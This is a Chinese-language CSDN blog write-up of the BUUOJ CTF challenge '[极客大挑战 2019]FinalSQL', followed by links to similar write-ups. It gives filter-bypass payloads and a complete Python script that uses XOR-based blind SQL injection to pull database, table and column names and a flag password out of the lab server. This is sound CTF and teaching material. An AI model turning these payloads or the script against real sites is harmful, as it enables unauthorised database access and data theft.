[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-02-23 21:33:47 发布
最新推荐文章于 2024-02-23 21:33:47 发布
阅读量284 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yao_xin_de_yuan/article/details/108306959
版权

[极客大挑战 2019]FinalSQL
通过?id=xxxx可以测试过滤情况、使用burpsuit的爆破模块爆破过滤情况。
过滤了等号ifunion#空格*=等等
未过滤select^单引号regexpasciisubstr、、regexpfromwhere等等
测试payload为:

?id=1^(ascii(substr(database(),1,1))>128)

附上脚本

import requests
import time
url="http://034e464a-0894-4c26-b4a8-c0932264dc6f.node3.buuoj.cn/search.php"
flag=""
for i in range(10,127):
    print(i,":")
    low=32
    high=128
    mid=(low+high)//2
    while low<=high:
        print(mid)
        #payload="?id=1^(ascii(substr(database(),{0},1))>{1})".format(i, mid) #数据库名,geek
    
        #payload="?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{0},1))>{1})".format(i, mid)#所有的数据库
        #information_schema,mysql,performance_schema,test,geek

        #payload="?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp('geek'))),{0},1))>{1})".format(i, mid)#表名
        #geek:F1naI1y,Flaaaaag

        #payload="?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where((table_name)regexp('F1naI1y'))),{0},1))>{1})".format(i, mid)#字段名
        #Flaaaaag:id,fl4gawsl.提示语句
        #F1naI1y:id,username,password

        payload="?id=1^(ascii(substr((select(password)from(F1naI1y)where((username)regexp('flag'))),{0},1))>{1})".format(i, mid)
        #username:mygod,welcome,site,site,site,site,Syc,finally,flag
        #flag:
        t = requests.get(url+payload)
        #print(t.text)
        if "NO! Not this! Click others~~~" in t.text:
            high = mid-1
            mid=(low+high)//2
        else:
            low=mid+1
            mid=(low+high)//2
    flag+=chr(high+1)
    print(flag)
    time.sleep(1)

相似题目POST注入https://blog.csdn.net/yao_xin_de_yuan/article/details/108306162

浪_zi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 487
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
buuctf [挑战 2019]FinalSQL
zoixsoadji的博客
03-30 718
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[挑战 2019]FinalSQL 1
plant1234的博客
04-30 1927
[挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 大佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
[挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 421
[挑战 2019]FinalSQL wp 终sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
sql注入 [挑战 2019]FinalSQL1
最新发布
m0_75178803的博客
02-23 926
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
BUUCTF [挑战 2019]FinalSQL
qq_60829702的博客
10-21 1297
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[挑战 2019]FinalSQL
zzqzzq11的博客
12-03 512
⽤之前的脚本,注意request库的get请求⽤的是param作为参数传递,⽽post⽤的是data。使⽤geek数据库获取表名,修改代码为:sql =使⽤F1nal1y表获取列名:sql =
[挑战 2019]FinalSQL1
azraelxuemo的博客
07-21 274
具体的思路网上也还有其他的,这里我就分享一个脚本 这个是爆数据名,表名,列名类推 import requests import time database_all = '' url = 'http://7023b2d9-28ff-48a1-b167-05f060adfc6e.node4.buuoj.cn/search.php?id=1' # 求出总长度的位数,比如说如果总长度为43,那么就是2位数 weishu = '' for i in range(1, 7): sql = "^(subst
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
达芬奇密码--buuctf密码学
yao_xin_de_yuan的博客
09-01 6703
题目描述 达芬奇一直是一个有争议的画家,科学家。。。小明为了研究他,从网上找到了名画蒙娜丽莎,一天深夜,小明突然从蒙娜丽莎背后的天空中看到了一串神秘的数字。顺带告诉小明达芬奇家窗台上有一串数字是关键。小明千里迢迢找到了这串数字,请将这个送分题做出来,亲,包邮哦(答案是一串32位十进制数字) 注意:得到的 flag 请包上 flag{} 提交 文件内容 达芬奇隐藏在蒙娜丽莎中的数字列: 1 233 3 2584 1346269 144 5 196418 21 1597 610 377 10946 89
五种常见的php伪协议
yao_xin_de_yuan的博客
08-31 5441
1、php://input 可以获取POST的数据流 条件: allow_url_include=On allow_url_fopen-Off/On POC: file =php://input POST:phpinfo(); 2、php://filter 可以获取指定文件的源码,但是当他与包含函数结合是,php://filter流会被当做php文件执行 。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取 条件: allow_url_fopen=Off/On allow_url_includ
BJDCTF 2nd 刷题记录
yao_xin_de_yuan的博客
03-23 2718
misc 最简单的misc zip伪加密---------7z解压 winhex打开文件发现png缺少头部 正常的png 加上89504e47得到图片(此处不知道为什么不能直接添加 因此winhex新建了一个文件将数据复制进去得到完整的png) 从图片中得到一串16进制字符串------------16进制转文本得到flag misc a-beautiful-gril ...
[RCTF2015]EasySQL
yao_xin_de_yuan的博客
08-30 1186
打开靶机看到登陆和注册的链接。 访问注册页面register.php,注册一个admin'"\用户 密码和邮箱为123。 登陆成功到index.php,可以看到输入的信息被原封不动的插入到了数据库。 点击用户名跳转到user.php,看到可以修改密码。 点击change_password跳转到changepwd.php 修改密码123为1234后,发现sql语句报错。 You have an error in your SQL syntax; check the manual that corr
[网鼎杯 2018]Fakebook
yao_xin_de_yuan的博客
09-01 976
Fakebook 先正常注册了一个用户名、密码和年龄都是123的用户,发现在注册的时候blog必须要一个网址才行,很明显后台做了过滤。登陆。 点击123,发现url很经典。 测试了一下,发现是个很简单的sql联合查询注入。这个过滤很神奇可能只是为了走个流程,过滤了union select。对!你没有看错,就是过滤了这两个单词加空格连在一起的字符串。所以我们用union/**/select就可以绕过了。 注入payload为: 0 union/**/select 1,database(),3,4%20fr
挑战 2019]EasySQL
09-03
EasySQL 是挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值